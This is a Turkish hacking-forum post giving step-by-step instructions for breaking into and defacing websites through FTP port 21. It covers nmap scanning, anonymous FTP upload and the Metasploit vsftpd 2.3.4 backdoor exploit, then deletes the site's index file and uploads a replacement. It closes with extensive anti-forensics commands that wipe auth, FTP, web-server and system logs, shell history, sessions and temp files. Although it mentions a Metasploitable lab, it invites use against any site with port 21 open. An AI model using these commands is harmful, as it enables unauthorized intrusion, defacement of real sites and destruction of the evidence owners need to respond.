CÜMLETEN SELAMIN ALEYKÜM
İlk öncelikle index atacağımız siteyi seçin
Sonrasında ping atarak web sitenin İp adresini öğrendikten sonra
Kali Linux içinde yüklü gelen nmap toolunu kullanarak şunu yazınız (eğerki nmap yüklü değilse sudo apt install nmap ile indirin)
Ben test olarak Metasploitable 2 kullanarak yapıcam siz istediğiniz yerde yapabilirsiniz
Ve sonrasında bulduğunuz Ip adresine nmap toolunu kullanarak şunu yazınız
nmap -sV -Pn -T3 (buraya web sitenin ıp adresini yazıp entere basın)
Eğerki Çıktıda :
21/tcp open ftp (21 portu açıksa 21 portundan sızıp kendi index dosyamızı yükleyebiliriz ama emin olmadan başlamayalım)
EMİN OLMAK İÇİN 21 PORTUNDA DAHA DETAYLI TARAMA YAPMALIYIZ
nmap -p 21 -sV -sC (sitenin ip adresi)
Çıktı bu şekilde olmalıdır
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.5
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| ftp-banner: Welcome to vulnerable FTP server
21/tcp open ftp → FTP servisi aktif
vsftpd 2.3.4 → eski bir versiyon (lablarda sık görülür)
Anonymous FTP login allowed --> şifresiz giriş var
ftp-banner → sunucunun verdiği mesaj
Eğerki bu şekilde ise çıktı direkt ftp (sitenin ip adresi) yazarak girebilirisiniz girdikten sonra kendi index dosyasını yükleyiniz Put index.php yazdığınızda index değişmiş olur
EĞERKİ ŞİFRE YADA USERNAME İSTERSE İSE MSFCONSOLE İLE YAPACAĞIZ İŞTE BU ŞEKİLDE
>> msfconsole
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(vsftpd_234_backdoor) > set RHOST (SİTENİN İP ADRESİ)
msf6 exploit(vsftpd_234_backdoor) > run (Dediğimiz zaman siteye sızmaya başlat burdan sonrasında birkaç deneme yaparak sızmaya çalışır başarılı olursa [*] Command shell session 1 opened yazar)
sızma işlemi başarılı olduktan sonra şunları yazın
|
|
|
\ /
cd /var/www/html (bunu yaparak web dosyalarının olduğu dizine gidiyoruz)
rm index.html (bunu yaparak web sitesinin arayüz dosyasını siliyoruz)
upload index.php /var/www/html/index.php (bunu yaparak kendi index dosyasını yükleyip index işlemini bitirmiş oluyorsunuz)
SONRASINDA LOGLARI SİLEREK ÇIKIŞ YAPMAK İÇİN BUNLARI YAPALIM
ÖNCELİKE SIZDIĞIMIZ CİHAZDA ADMİN OLMAK İÇİN
sudo -i (bu sayede admin yetkisine eriştik)
cat /var/log/vsftpd.log # Önce içeriği gör (IP'n ve girişin gözüksün mü diye)
echo "" > /var/log/vsftpd.log # Log dosyasını boşalt
# Auth.log'da FTP girişi varsa onu da temizleyelim:
sed -i '/vsftpd/d' /var/log/auth.log
echo "" > /var/log/auth.log
#SIZDIĞINIZ SİSTEM APACHE/NGİNX İSE
ps aux | grep -E "apache|nginx"
#APACHE İSE
www-data 1234 0.0 apache2
www-data 1235 0.0 apache2
#NGİNX İSE
www-data 2234 0.0 nginx: worker process
SONRASINDA BU SİSTEMLERDENDE LOGUNUZU SİLMEK İÇİN ŞUNU YAZIN
cd /var/log/apache2/ # Veya /var/log/nginx/ eğer nginx ise
echo "" > access.log
echo "" > error.log
rm -f access.log.* error.log.* # Rotate logları da sil
cd /var/log/
echo "" > syslog
echo "" > messages
echo "" > kern.log
history -c && history -w # Shell history'sini sil (msf shell'inde çalışır)
truncate -s 0 /var/log/auth.log /var/log/secure /var/log/lastlog /var/log/wtmp /var/log/btmp
Web Sunucu Önbelleği ve Oturumu
rm -rf /var/www/html/*.php~* /tmp/* # Backup ve temp dosyaları sil
rm -rf /var/lib/php/sessions/* # PHP session dosyaları (eğer varsa)
service apache2 restart # Web sunucuyu restart et, log rotate'ını tetikle (opsiyonel, dikkatli ol)
exit # Msf shell'den çık
BU ŞEKİLDE İSTEDİĞİNİZ 21/FTP PORTU AÇIK OLAN SİTEYE SIZAZBİLİRSİNİZ
SAYGILAR.....
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl